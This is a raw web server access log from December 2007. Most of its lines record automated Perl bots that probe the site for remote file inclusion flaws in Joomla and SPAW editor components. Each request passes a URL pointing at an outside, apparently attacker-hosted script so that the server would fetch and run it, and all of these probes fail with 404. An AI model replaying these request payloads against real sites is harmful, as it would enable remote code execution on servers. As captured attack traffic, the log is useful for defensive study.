211.115.112.28 - - [15/Dec/2007:08:06:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cbe.kaist.ac.kr/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.112.28 - - [15/Dec/2007:08:08:01 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cbe.kaist.ac.kr/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:08:08:58 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:08:08:58 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.9.75.244 - - [15/Dec/2007:08:11:03 -0800] "GET /logs/access_071202.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-misfits.com/fixed/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [15/Dec/2007:08:11:04 -0800] "GET /logs/access_071112.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-misfits.com/fixed/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.63.186 - - [15/Dec/2007:08:12:05 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Dec/2007:08:12:05 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.197.132 - - [15/Dec/2007:08:12:39 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.146.62 - - [15/Dec/2007:08:14:15 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.26 - - [15/Dec/2007:08:14:23 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gl0w.kit.net/wh.php???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.26 - - [15/Dec/2007:08:14:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gl0w.kit.net/wh.php???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.26 - - [15/Dec/2007:08:14:23 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gl0w.kit.net/wh.php???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.26 - - [15/Dec/2007:08:14:23 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gl0w.kit.net/wh.php???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.72 - - [15/Dec/2007:08:15:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.99.246 - - [15/Dec/2007:08:15:56 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.197.132 - - [15/Dec/2007:08:16:22 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.197.132 - - [15/Dec/2007:08:16:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.99.246 - - [15/Dec/2007:08:16:28 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.197.132 - - [15/Dec/2007:08:16:41 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.10.114 - - [15/Dec/2007:08:16:44 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:17:20 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.10.114 - - [15/Dec/2007:08:17:24 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.146.62 - - [15/Dec/2007:08:17:30 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.146.62 - - [15/Dec/2007:08:17:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.146.62 - - [15/Dec/2007:08:17:53 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.72 - - [15/Dec/2007:08:19:44 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [15/Dec/2007:08:19:45 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [15/Dec/2007:08:20:21 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.112.28 - - [15/Dec/2007:08:20:55 -0800] "GET /logs/access_071207.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cbe.kaist.ac.kr/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:21:09 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:21:09 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:21:23 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.112.28 - - [15/Dec/2007:08:21:28 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cbe.kaist.ac.kr/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.103.20.46 - - [15/Dec/2007:08:23:41 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.20.46 - - [15/Dec/2007:08:23:42 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.20.46 - - [15/Dec/2007:08:23:42 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.20.46 - - [15/Dec/2007:08:23:42 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:08:26:27 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.9.75.244 - - [15/Dec/2007:08:26:41 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-misfits.com/fixed/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.9.75.244 - - [15/Dec/2007:08:26:42 -0800] "GET /logs/access_071016.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-misfits.com/fixed/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:08:26:55 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.145.200 - - [15/Dec/2007:08:30:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.200 - - [15/Dec/2007:08:30:39 -0800] "GET /minamijewelry/html/kids.html HTTP/1.0" 200 19771 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
66.7.198.72 - - [15/Dec/2007:08:31:35 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [15/Dec/2007:08:31:35 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:31:44 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:31:44 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.myrentaldesk.com/securemembership/data/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.146.62 - - [15/Dec/2007:08:32:06 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.146.62 - - [15/Dec/2007:08:32:07 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.125.23.221 - - [15/Dec/2007:08:32:39 -0800] "GET /bikes/ HTTP/1.1" 200 2052 "http://www.google.co.in/search?hl=en&q=intitle%3A%22index.of%22%28jpg%7Cgif%29bikes&btnG=Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
124.125.23.221 - - [15/Dec/2007:08:32:43 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
124.125.23.221 - - [15/Dec/2007:08:33:04 -0800] "GET /bikes/IMG_1188.jpg HTTP/1.1" 200 327680 "http://www.dmulk.com/bikes/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:36:15 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:08:38:46 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [15/Dec/2007:08:38:46 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:39:14 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:39:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:39:29 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.63.186 - - [15/Dec/2007:08:39:44 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Dec/2007:08:40:30 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.130.43.166 - - [15/Dec/2007:08:43:00 -0800] "GET /editor2/spaw_control.class.php?spaw_root=http://mtin.info/tiny_includes/can? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
74.208.16.6 - - [15/Dec/2007:08:47:23 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theninjalegion.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.6 - - [15/Dec/2007:08:47:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theninjalegion.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.6 - - [15/Dec/2007:08:47:23 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theninjalegion.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.6 - - [15/Dec/2007:08:48:01 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://theninjalegion.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:49:23 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [15/Dec/2007:08:49:23 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:49:44 -0800] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:49:44 -0800] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.248.15 - - [15/Dec/2007:08:50:08 -0800] "GET ///admin/header.php?loc=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [15/Dec/2007:08:50:09 -0800] "GET /logs///admin/header.php?loc=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [15/Dec/2007:08:50:11 -0800] "GET /logs/access_071127.log///admin/header.php?loc=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.248.15 - - [15/Dec/2007:08:50:36 -0800] "GET /logs/access_071126.log///admin/header.php?loc=http://zoolandia.t35.com/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:50:37 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:50:37 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.63.186 - - [15/Dec/2007:08:53:03 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [15/Dec/2007:08:53:03 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:58:31 -0800] "GET /logs/access_071202.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:58:35 -0800] "GET /logs/access_071202.log/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:58:40 -0800] "GET /logs/access_071112.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.183 - - [15/Dec/2007:08:58:42 -0800] "GET /logs/access_071112.log/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.33.12 - - [15/Dec/2007:09:00:30 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.33.12 - - [15/Dec/2007:09:00:30 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.33.12 - - [15/Dec/2007:09:00:30 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.33.12 - - [15/Dec/2007:09:00:30 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.33.12 - - [15/Dec/2007:09:00:30 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.165.33.12 - - [15/Dec/2007:09:00:30 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
134.241.103.8 - - [15/Dec/2007:09:01:39 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.241.103.144 - - [15/Dec/2007:09:01:39 -0800] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
134.241.103.8 - - [15/Dec/2007:09:01:39 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.241.103.144 - - [15/Dec/2007:09:01:39 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
134.241.103.8 - - [15/Dec/2007:09:01:39 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.241.103.144 - - [15/Dec/2007:09:01:39 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
134.241.103.8 - - [15/Dec/2007:09:01:56 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.241.103.8 - - [15/Dec/2007:09:01:56 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.241.103.8 - - [15/Dec/2007:09:01:56 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
134.241.103.144 - - [15/Dec/2007:09:01:59 -0800] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
